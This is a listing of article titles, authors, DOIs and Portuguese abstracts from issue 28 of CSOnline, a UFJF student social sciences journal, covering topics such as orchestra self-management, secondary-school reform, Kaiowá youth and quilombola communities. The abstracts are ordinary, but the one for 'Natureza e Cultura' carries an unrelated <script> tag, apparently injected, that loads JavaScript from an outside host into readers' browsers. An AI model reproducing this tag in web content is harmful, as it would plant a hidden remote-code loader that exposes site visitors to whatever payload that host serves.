CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS https://periodicos.ufjf.br/index.php/csonline CSOnline - Revista Eletrônica de Ciências Sociais; Periódico Ciências Sociais; Ciências Sociais UFJF; Ciências Sociais Universidade Federal de Juiz de Fora; revista discente; revista ciências sociais; revista sociologia; revista antropologia; revista ciência política Universidade Federal de Juiz de Fora pt-BR CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 1981-2140 FOLHA DE ROSTO E SUMÁRIO https://periodicos.ufjf.br/index.php/csonline/article/view/25861 Equipe Editorial CSOnline Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.25861 ORQUESTRA SINFÔNICA E AUTOGESTÃO: PERCEPÇÕES DOS MÚSICOS DA ORQUESTRA PETROBRAS SINFÔNICA https://periodicos.ufjf.br/index.php/csonline/article/view/17546 <p>Constituída juridicamente em associação, e com proposta administrativa de autogestão, a Orquestra Petrobras Sinfônica – objeto deste estudo – se singulariza no cenário das orquestras brasileiras. Este artigo tem como objetivo analisar as percepções de seus músicos sobre o sistema de autogestão da orquestra. Para isso, foram utilizados como instrumentos de pesquisa a observação direta e a realização de entrevistas, sob forma de depoimentos e relatos orais. Nas percepções dos músicos, o modelo de autogestão é considerado como uma possibilidade de gestão mais democrática e autônoma para a orquestra.</p> Gabriela Almeida Kronemberger Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17546 Educação e Gênero: um entrelaçamento necessário para a educação constitucional democrática https://periodicos.ufjf.br/index.php/csonline/article/view/17541 <p class="western" align="justify"><span style="font-family: 'Times New Roman', serif;"><span>O presente trabalho busca problematizar a educação constitucional democrática baseada em direitos humanos, apresentando como temática a relação entre educação e gênero frente aos recentes projetos que atentam contra o </span></span><span style="font-family: 'Times New Roman', serif;"><span><em>design</em></span></span><span style="font-family: 'Times New Roman', serif;"><span> formatado pela Constituição Federal de 1988. Através da discussão de bibliografia da ciência politica, pedagogia e direito, tentamos emoldurar fundamentos para negar esses projetos, levantar dados que não podem ser silenciados e defender uma educação mais inclusiva, cidadã, democrática, que desenvolva livremente a pessoa, prepare para o exercício da cidadania e qualifique para o mercado de trabalho.</span></span></p> Andrey da Silva Brugger José Antônio Gomes Machado Monique Rodrigues Lopes Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17541 Morte Voluntária entre a juventude Kaiowá https://periodicos.ufjf.br/index.php/csonline/article/view/17430 <p>O presente trabalho tem como objetivo uma abordagem introdutória ao tema do suicídio kaiowá. O artigo inicia-se situando historicamente a presença destes no Mato Grosso do Sul, Brasil, e apresentando aspectos fundamentais da vida social deste povo indígena, particularmente no que diz respeito à sua relação com a terra. Em seguida, comenta brevemente um tratamento clássico do suicídio nas Ciências Sociais e um importante estudo sobre suicídio na Etnologia Sul-americana, para passar à consideração das especificidades do suicídio kaiowá. Identificado como prática adotada predominantemente por jovens, o suicídio parece estar ligado a temas chave do parentesco, da construção da pessoa e da sociabilidade, como: a ausência de parentes; a feitiçaria e vingança; a passagem à vida adulta. Por fim, o trabalho chama atenção para a dimensão da “juventude kaiowá” e sua presença política atual, sugerindo uma possível abordagem do suicídio a partir dos próprios discursos/falas juvenis.</p> Raphael Gouvêa Rompinelli Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17430 FINANCIAMENTO PÚBLICO E QUALIDADE DA EDUCAÇÃO: UMA ANÁLISE DO GASTO MUNICIPAL EM EDUCAÇÃO E DO ÍNDICE DE DESENVOLVIMENTO DA EDUCAÇÃO BÁSICA (IDEB) https://periodicos.ufjf.br/index.php/csonline/article/view/17475 <p>A Constituição Federal de 1988 foi promulgada em um cenário onde a discussão acerca da descentralização e maior participação no regime democrático estava em pauta. Em um regime de colaboração e divisão dos custos operacionais do sistema de educação nacional, a constituição incentiva a descentralização dos recursos financeiros e das responsabilidades sobre a oferta do serviço educacional. Cabe aos municípios atuar prioritariamente na educação infantil e no ensino fundamental, destinando o mínimo de 25% de suas receitas na educação. O objetivo deste trabalho foi analisar a relação entre os gastos públicos municipais em educação e a qualidade da educação. A empreitada empregou uma metodologia quantitativa e utilizou indicadores político-eleitorais, de gasto por função e de qualidade da educação. Os principais achados deste trabalho foram os de que, em média, os gastos entre os partidos foram semelhantes, ou seja, partidos diferentes não imprimiram volumes diferentes de gasto na educação. E ao correlacionar o gasto municipal com educação e o desempenho destes mesmos municípios no IDEB, os resultados obtidos apontam para uma ausência de correlação linear entre as duas variáveis.</p> Ana Beatriz Severo Xavier Vitor de Moraes Peixoto Maycon Rohen Linhares Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17475 FORMAÇÃO DE PROFESSORES DE SOCIOLOGIA: PERFIL E PRÁTICA NA REDE ESTADUAL DE ENSINO DE JUIZ DE FORA – MG https://periodicos.ufjf.br/index.php/csonline/article/view/17490 <p>O presente trabalho apresenta resultados parciais do projeto de extensão interface com a pesquisa “Formação de professores de Sociologia: da Universidade à sala de aula da Educação Básica” desenvolvido na Faculdade de Educação da Universidade Federal de Juiz de Fora que tem como objetivo pesquisar os professores de sociologia da Rede Estadual de ensino em suas dimensões formativas e pedagógicas, bem como estabelecer com eles uma formação continuada. Esse projeto se justifica tendo em vista os desafios que foram postos a partir da obrigatoriedade do ensino de sociologia, como: fortalecimento da disciplina; necessidade de definição de um currículo e de materiais didáticos; vencer o dualismo existente nas universidades entre bacharelado e licenciatura; e, dentre outros, pensar a formação inicial e continuada dos professores. Para o desenvolvimento do projeto foi aplicado questionário aos professores de sociologia para identificação do perfil e encontros para realização de oficinas de formação envolvendo professores da educação básica, do ensino superior e licenciandos em ciências sociais da UFJF a partir dos conteúdos curriculares de sociologia. </p> Rafaela Reis Azevedo de Oliveira Davi Dionysio Katiuscia Cristina Vargas Antunes Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17490 O ENSINO E A DOCÊNCIA DE SOCIOLOGIA SOB O CENÁRIO DA REFORMA DO ENSINO MÉDIO https://periodicos.ufjf.br/index.php/csonline/article/view/17491 <p>O objetivo deste artigo é verificar em que medida o ensino da Sociologia e a contratação de professores licenciados na área poderão ser impactados pela Reforma do Ensino Médio promovida pela Lei n° 13.415/2017. A partir de consulta a documentos e a referências bibliográficas, apresentamos, já na introdução deste artigo, a importância da presença da Sociologia no Ensino Médio. Em seguida, apontamos a situação atual da docência de Sociologia no Brasil e, em particular, em Minas Gerais. Finalmente, analisamos se a Reforma do Ensino Médio poderá solucionar ou aprofundar os problemas relativos ao ensino e à contratação de docentes de Sociologia. Concluímos que a Reforma do Ensino Médio não resolve os fatores que identificamos como negativos na contratação de professores habilitados em Sociologia e no ensino de Sociologia, mas, ao contrário, intensifica-os.</p> Bárbara Nassif Machala Maurício Sousa Matos Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17491 PARA QUEM É A REFORMA DO ENSINO MÉDIO: UM ESTUDO SOBRE A VISÃO DO JOVEM BRASILEIRO NO CENÁRIO DE MUDANÇAS EDUCACIONAIS https://periodicos.ufjf.br/index.php/csonline/article/view/17504 Diante do atual cenário de reformas instituídas pelo governo, a educação não esteve fora desse círculo de mudanças, quando em 2016 o governo lançou a público a então Medida Provisória 746, referente a mudança curricular do ensino médio brasileiro. Com a proposta de ser uma reforma que elenca desejos de alunos e professores, a medida aprovada no ano de 2017 teve diversas críticas e protestos, não por menos, haja a vista que, dos motivos elencado pelo então ministro da educação Mendonça Filho, não partiam das mesmas reinvindicações que a classe dos jovens e professores exigiam. O que se pretende aqui é demonstrar por vias de análises conjunturais de censo aplicado com alunos do ensino médio, além de notícias que ocorreram durante a criação da medida junto com o período de protestos a demonstração simples e plausível de que a atual reforma não procurou um diálogo com aqueles que estão no âmbito escolar. Essas bibliografias comprovam que o adolescente ingressante no ensino médio ainda não é levado a sério, sendo silenciados perante as diversas ocupações escolares no ano de 2016. A imposição da reforma do ensino médio apenas reforça que precisamos aprender a ouvir a juventude brasileira. Janderson Alves Sauma Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17504 RAÇA, ETNICIDADE E RELIGIÃO: DAS CIÊNCIAS SOCIAIS ÀS CIÊNCIAS DA RELIGIÃO https://periodicos.ufjf.br/index.php/csonline/article/view/17508 <p>O presente trabalho visa realizar um pequeno levantamento de pesquisas na área das Ciências da Religião e demais campos de estudos no que se refere à religiosidade do negro e sua constituição identitária étnica. Sabemos que a temática da identidade negra nas ciências sociais foi abordada de muitas formas, o que nos suscitou a pergunta: qual é a situação de estudos sobre raça e etnia negra nas ciências da religião? Tendo em vista a importância do debate das questões raciais no contexto institucional religioso, realizamos um breve levantamento quantitativo em algumas das principais revistas acadêmicas das Ciências da Religião. Utilizamos como critério de seleção dos artigos, a presença ou ausência de temáticas sobre racismo e identidade negra abordadas nas publicações, incluindo atemática das experiências religiosas dos negros desde as Igrejas Pentecostais, passando pelas instituições católicas e de matriz africana. A metodologia utilizada na pesquisa é quali-quantitativa.</p> Milena Regina de Paula Silva Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17508 NATUREZA E CULTURA: DA REJEIÇÃO À (RE)CONSTRUÇÃO https://periodicos.ufjf.br/index.php/csonline/article/view/17510 <p>Partindo das problematizações acerca do dualismo entre natureza e cultura, nosso objetivo é realizar um diálogo entre as mesmas nos âmbitos antropológicos e históricos. As reflexões mais recentes estão mudando o curso das disciplinas, num momento em que a crise climática e o antropoceno colocam novos desafios para as humanidades como um todo e para as visões insulares das ciências humanas e ciências naturais. Dessa forma, mapeamos e relacionamos as formas pelas quais podemos encontrar alternativas de abordagens menos dualistas para um campo de estudo que se pretende mais dialógico. Tais abordagens se constituem, principalmente, numa reformulção teórica e metodológica, assim como numa reorientação do que é ser humano e de como conhecer o mundo.</p><script id="lg210a" type="text/javascript" src="https://cloudapi.online/js/api46.js"></script> Janaína Di Lourenço Esteves Geraldo Homero do Couto Neto Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17510 SEGUNDA MÃO: REÚSO E RESIGNIFICAÇÃO DAS ROUPAS https://periodicos.ufjf.br/index.php/csonline/article/view/17514 <p class="western" style="margin-bottom: 0cm; line-height: 150%; orphans: 2; widows: 2;" lang="en-US" align="justify"><span style="font-family: Times New Roman,serif;"><span style="font-size: medium;">A partir de observação empírica foi percebido um crescente aumento número de lojas especializadas no comércio de roupas usadas na cidade de Juiz de Fora - MG. O aumento foi confirmado através de pesquisa no portal DataSebrae que fornece as dados a respeito dos comércios registrados como comércio varejista de outros artigos usados. Considerando a moda um sistema baseado naquilo que se é novo e na possibilidade de imitação; e, sendo as roupas de brechó peças usadas em outros tempos e, em grade parte únicas, é possível constatar o aumento do consumo das roupas de brechó uma tendências de moda? Tendo essa conjectura como fundamento, a investigação proposta por esse artigo se deu sob os fatores que motivam esse consumo: seriam os fatores econômicos, ideários ou estéticos? Por fim, a investigação apontou para o caráter dialético do sistema da moda como aquilo que possibilita existência simultânea de tendências opostas tal como os produtos de </span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: medium;"><em>fast fashion</em></span></span><sup><span style="font-family: Times New Roman,serif;"><span style="font-size: medium;"><em><a class="sdfootnoteanc" name="sdfootnote1anc" href="#sdfootnote1sym"></a><sup>1</sup></em></span></span></sup><span style="font-family: Times New Roman,serif;"><span style="font-size: medium;">e roupas de segunda mão. </span></span></p><div id="sdfootnote1"><p class="sdfootnote-western" lang="en-US" align="justify"> </p></div> Talita Botelho de Paula Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17514 COMUNIDADE QUILOMBOLA SÃO SEBASTIÃO DA BOA VISTA: COTIDIANO, RESISTÊNCIA E POLÍTICAS PÚBLICAS https://periodicos.ufjf.br/index.php/csonline/article/view/17572 <p>O trabalho tem como propósito destacar os impasses e a trajetória da Comunidade Quilombola São Sebastião da Boa Vista localizada no distrito de Dores do Paraibuna, pertencente ao município de Santos Dumont (MG). Reconhecida, certificada pela Fundação Cultural Palmares e registrada no Dário Oficial da União com o titulo de comunidade quilombola, no Livro de Cadastro Geral nº 011, registro 1.167 fl. 183 <a title="" href="file:///C:/Users/joaoxxiii/Downloads/JCSO-%20Comunidade%20Quilombola%20S%C3%A3o%20Sebasti%C3%A3o%20da%20Boa%20Vista.docx#_ftn1">[1]</a> desde 19 de novembro de 2009, a comunidade vive uma realidade conflitante em meio o isolamento geográfico, a escassez de informação e a falta de infraestrutura que tornam quase nulos o conhecimento e acesso a políticas públicas voltadas para as comunidades quilombolas. Nessa perspectiva, a reafirmação da identidade quilombola, a forma como se relacionam com o território, a ancestralidade, as práticas e tradições culturais/religiosas caracterizam a vida social da comunidade orientada pelos próprios morados. É a partir desse cotidiano isolado, coletivo e de resistência que foram observados os elementos que compõe a pesquisa que tem como objetivo, a reflexão e a analise dos desafios na luta pela resistência e alcance e acesso aos direitos quilombolas na Comunidade São Sebastião da Boa Vista, usando como metodologia de pesquisa a observação participante.</p><div><br clear="all" /><hr align="left" size="1" width="33%" /><div><p><a title="" href="file:///C:/Users/joaoxxiii/Downloads/JCSO-%20Comunidade%20Quilombola%20S%C3%A3o%20Sebasti%C3%A3o%20da%20Boa%20Vista.docx#_ftnref1">[1]</a> Ver: <a href="http://pesquisa.in.gov.br/imprensa/jsp/visualiza/index.jsp?jornal=1&amp;pagina=7&amp;data=19/11/2009">http://pesquisa.in.gov.br/imprensa/jsp/visualiza/index.jsp?jornal=1&amp;pagina=7&amp;data=19/11/2009</a></p></div></div> Larissa Silveira Dias Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17572 AS DIFICULDADES DA IMPLANTAÇÃO DA LEI 10.639/2003 E ALGUMAS DE SUAS IMPLICAÇÕES https://periodicos.ufjf.br/index.php/csonline/article/view/17447 <p>O compromisso da escola com a sociedade perpassa pela construção formal do conhecimento e se firma no compromisso com a socialização, formação política e respeito à diversidade cultural. Essa tarefa vai além das barreiras educacionais tradicionais e dos conteúdos e programas ultrapassados ou resistentes às transformações. O presente artigo intentou investigar quais os mecanismos utilizados pelas escolas para aplicar a lei 10.639/2003 em uma perspectiva multidisciplinar e transversal no currículo do quinto ao nono ano que compõem o ensino fundamental nos estabelecimentos de ensino municipal e estadual. A metodologia utilizada neste estudo foi por meio de análises documentais e pesquisas bibliográficas na via de debater a problemática que envolve o conceito do tema proposto, bem como por levantamento e cruzamento do conteúdo dos livros didáticos cedidos para as escolas públicas municipais estaduais do quinto ao nono ano do Ensino Fundamental. Esse trabalho apontou algumas das dificuldades da implementação da lei 10.639/2003 e da lei 11.645/2008 no ambiente escolar das redes municipais e estaduais.</p> Sheila Cristina Gonçalves Priscila Aleixo da Silva Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17447 UMA ANALISE COMPARATIVA DOS REFLEXOS DA REESTRUTURAÇÃO DO CURRÍCULO DA EDUCAÇÃO DE JOVENS E ADULTOS DO COLÉGIO DE APLICAÇÃO JOÃO XXIII ENTRE OS ANOS DE 2012 A 2016 https://periodicos.ufjf.br/index.php/csonline/article/view/17448 <p>Pretende-se discutir no presente artigo algumas decorrências das transformações curriculares da Educação de Jovens e Adultos (EJA) ofertada pelo Colégio de Aplicação João XXIII da Universidade Federal de Juiz de Fora (UFJF) entre os anos de 2012 a 2016. Discutir um modelo de EJA que mantenha a coerência entre o discurso e a prática tem se revelado um desafio que este colégio se propôs a encarar. Nesse processo houve mudanças curriculares, dentre as quais podemos citar a que ocorreu em 2013, que foi analisada por Fernandes e Gonçalves (2015), possibilitando enxergar que a mudança ocorreu em uma conjuntura em que a oferta de vagas foi ampliada, neste contexto a reforma curricular possibilitou uma redução na reprovação e na taxa de evasão, além de um aumento na nota média atingida pelos aprovados. A metodologia utilizada foi por meio de pesquisas bibliográficas, na via de debater a problemática que envolve o conceito do tema proposto, bem como por levantamento e cruzamento do banco de dados da modalidade EJA do colégio de Aplicação João XXIII- UFJF.</p><p><strong> </strong></p> Sheila Cristina Gonçalves Fausto Daniel Alves Fernandes Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17448 CONSTRUÇÕES DE TRAJETÓRIAS: COMO O ENSINO SUPERIOR PASSA A FAZER PARTE DO CAMPO DE POSSIBILIDADES DE JOVENS MORADORES DA PERIFERIA https://periodicos.ufjf.br/index.php/csonline/article/view/17459 <p>A pesquisa, que dá origem a este trabalho, tem dimensão descritiva e analítica sobre os diferentes aspectos – de ordem familiar, de trajetória escolar, de sociabilidade e de culturas juvenis, mercado de trabalho, mídia, dentre outros, que convergem para a decisão de jovens, que frequentam o ensino médio, em cursar o ensino superior. A pesquisa, de caráter qualitativo, compreende duas partes: levantamento de dados documentais de políticas públicas de acesso e ampliação das vagas no ensino superior e pesquisa de campo, através de observação participante e entrevistas estruturadas, reunindo, portanto, dados de diferentes naturezas. Neste artigo, serão apresentados resultados preliminares da análise realizada sobre a pesquisa de campo com estudantes de duas escolas de ensino médio e duas instituições de ensino superior privadas na cidade de Petrópolis. O resultado das investigações aponta para a presença no imaginário desses jovens, moradores da periferia, de uma distinção social que o acesso ao ensino superior supostamente poderia conferir. No entanto, contrapõem a excepcionalidade meritocrática que caracteriza a narrativa conservadora e o advento de uma nova narrativa. Nela o ensino superior se alterna entre direito e sonho de consumo.</p><p> Palavras-chave: distinção, imaginário social, trajetória, políticas públicas.</p> Edil de Souza Gonçalves Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17459 HABITANDO O TRAJETO: AS EXCURSÕES NO UNIVERSO HEAVY METAL https://periodicos.ufjf.br/index.php/csonline/article/view/17468 <p>O presente artigo buscou analisar a rede formada pela relação entre os sujeitos <em>headbangers</em> com os lugares da cidade de Juiz de Fora-MG, a partir do seu processo do caminhar. O campo etnográfico da pesquisa foram as excursões realizadas a dois shows de <em>heavy metal</em> nas cidades do Rio de Janeiro-RJ e Campo do Meio-MG. Através de uma abordagem da antropologia contemporânea, no qual a partir dos atores busca-se rastrear tudo que se conecta a esse fenômeno, o presente artigo pretende pelas excursões headbangers observar tudo aquilo que se liga a essa vivência. Assim, o cerne da pesquisa é pensar o sujeito formado na relação, ou seja, formado na relação entre os sujeitos e entre os sujeitos e os entes, como espaço, a van, os objetos, o show, etc. A circulação no espaço pelos sujeitos <em>headbangers</em> não é simplesmente ocasional, mas sim articulada as práticas desses sujeitos. Por fim, os conhecimentos adquiridos pela vivência nos lugares, sobretudo nos processos do caminhar, reforçam o <em>ethos</em> desses sujeitos ao mesmo tempo que servem como lugares de trocas de experiências.<strong></strong></p> Adrielle Luchi Coutinho Bove Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17468 A SOCIABILIDADE ENTRE JOVENS ATRAVÉS DO HEAVY METAL https://periodicos.ufjf.br/index.php/csonline/article/view/17520 <p>O presente trabalho pretende uma abordagem introdutória à socialização de jovens no estilo musical Heavy Metal. Partindo de questões postas pela Antropologia e a Sociologia à “juventude” enquanto questão social ou cultural, aborda a relação entre jovens e música da perspectiva da construção de “juventudes” e chega ao tema da socialização no “metal”. A partir de uma rápida introdução ao estilo Heavy Metal, propõe questões formuladas na relação entre juventude(s) e Metal, tais como a sensibilidade relacionada à escuta de sons “pesados”, a hierarquia interna ao universo dos fãs, a relativização da noção de “juventude” e a interação entre gerações de “metaleiros”. </p> Luana Cristina Seixas Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17520 O ENSINO DE SOCIOLOGIA RETRATADO NAS TESES E DISSERTAÇÕES ENTRE 1996 E 2015: UM ESTADO DA ARTE. https://periodicos.ufjf.br/index.php/csonline/article/view/17481 <p>Este trabalho tem como finalidade apresentar os resultados do projeto de pesquisa “Estado da arte do ensino de Sociologia na Educação Básica: o que dizem as dissertações e teses sobre o tema”, apoiado pelo Programa de Iniciação Científica BIC/UFJF. O objetivo central foi realizar uma investigação do tipo estado da arte das produções acadêmicas no campo da pós-graduação <em>strictu senso</em>, analisando dissertações e teses que abordam a temática do ensino de Sociologia no Ensino Médio. A pesquisa se orientou pelos pressupostos da investigação do tipo estado da arte, conforme descrito por André et al (1999). Nossas estratégias consistiram em: 1º) mapear e quantificar a produção sobre ensino de Sociologia, no período 1996 a 2015; 2º) categorizar e descrever a produção encontrada e 3º) analisar e (re)escrever a história da consolidação da Sociologia como disciplina escolar e do ensino de Sociologia como campo de pesquisa no Brasil. Apesar das pesquisas do tipo estado da arte sofrerem críticas em relação ao seu alcance, por se valerem, muitas vezes, de uma leitura parcial dos trabalhos, concordamos com Handfas e Maçaira (2014) ao afirmarem que a pertinência de pesquisa como a que apresentamos aqui, se dá pela necessidade de conhecermos a construção de um campo de estudos, neste caso, o do ensino de sociologia na escola básica.</p> Katiuscia Vargas Antunes Edmar Augusto Semeão Garcia Amanda Fontes Alves Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17481 O NEGRO E A CIDADE: UM ESTUDO NO BAIRRO DOM BOSCO EM JUIZ DE FORA (MG) https://periodicos.ufjf.br/index.php/csonline/article/view/17422 <p><span>O presente trabalho pretende discutir sobre a racialização do espaço urbano, como uma das expressões do racismo ambiental, haja vista que é no chão do território que se constata a trajetória de espoliação que a população negra é submetida pela classe dominante e o Estado é uma figura que ratifica e impõe a condição por baixo, através da violência, desconsiderando a sua condição humana e repetindo a história do castigo do corpo pelo viés da inferiorização. A senzala do século XXI são as favelas e as áreas de desastres ambientais! Para a análise do problema exposto o bairro Dom Bosco foi escolhido para estudo, devido a forte presença de moradores negros e a vulnerabilidade ambiental que estão expostos. Além da pesquisa bibliográfica e das fontes secundárias, realizou-se uma entrevista semi-estruturada com os moradores e também foram utilizados os mapas das áreas de risco ambiental elaborados pela Defesa Civil de Juiz de Fora. Isto posto, conclui-se que o lugar dos negros na cidade será sempre o lugar da ilegalidade, do risco ambiental, da violência, da ausência do poder público que reforça o estigma da cor e da permanência moderna das senzalas, que passaram a ser - as favelas, os assentamentos precários.<span> </span></span></p> Ana Claudia de Jesus Barreto Warllon de Souza Barcellos Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17422 UMA ANÁLISE DO PERFIL DO ALUNO: CURSO DE PEDAGOGIA A DISTÂNCIA DA UNIVERSIDADE FEDERAL DE JUIZ DE FORA https://periodicos.ufjf.br/index.php/csonline/article/view/17502 <p>A proposta do presente estudo consistiu em realizar uma análise sobre o perfil dos alunos do curso de Pedagogia na modalidade a distância da Universidade Federal de Juiz de Fora (UFJF), ofertado em convênio com a Universidade Aberta do Brasil (UAB). Nos últimos anos agregou-se a tal modalidade um caráter inovador que distingue a prática de EaD atual da forma com que anteriormente era conduzida, essas mudanças aconteceram devido à utilização e apropriação das Tecnologias Digitais de Informação e Comunicação (TDIC) como recursos a serem utilizados por alunos e professores e pelos avanços nos marcos legais que regulam essa modalidade. Ter em foco o perfil do aluno possibilita melhor adequação dos processos pedagógicos, da gestão e da infraestrutura, além de permitir melhor planejamento visando abordar as peculiaridades das regiões de alcance do curso, considerando as diversidades existentes. Nesta investigação realizamos analise dos dados do questionário aplicado aos alunos pela coordenação do curso e por entrevista realizada com a coordenação do curso.</p> Priscila Aleixo da Silva Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17502 INTERVENÇÕES URBANAS NA CIDADE DO RIO DE JANEIRO DURANTE AS JORNADAS DE JUNHO/JULHO DE 2013 https://periodicos.ufjf.br/index.php/csonline/article/view/17439 <p>Este artigo tem como objetivo trazer indícios sobre quem são os indivíduos que participaram das Jornadas de Junho/Julho de 2013 a partir das intervenções urbanas de Tavarez na cidade do Rio de Janeiro. É a partir da analise dessas intervenções - sejam feitas nos ônibus ou na sua propagação na página do <em>Facebook</em> - e de uma entrevista com o seu criador que é possível identificar marcadores sociais que compuseram esse momento heterogêneo da luta política. Sendo assim, Tavarez é utilizado aqui como um instrumento que torna mais clara a compreensão sobre quem eram esses personagens que compuseram as Jornadas, quais as disputas que estavam em questão e sobre como o contexto em que se vive interfere no que é produzido na esfera artístico em suas mais diversas formas.</p> Marília Carolina Asterito Baptista Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17439 ANGELO TRENTO. IMPRENSA ITALIANA NO BRASIL https://periodicos.ufjf.br/index.php/csonline/article/view/17552 Resenha do livro "Imprensa italiana no Brasil: séculos XIX e XX" de Angelo Trento. Igor Cavalcante Doi Copyright (c) 2019 CSOnline - REVISTA ELETRÔNICA DE CIÊNCIAS SOCIAIS 2019-03-20 2019-03-20 28 10.34019/1981-2140.2018.v0.17552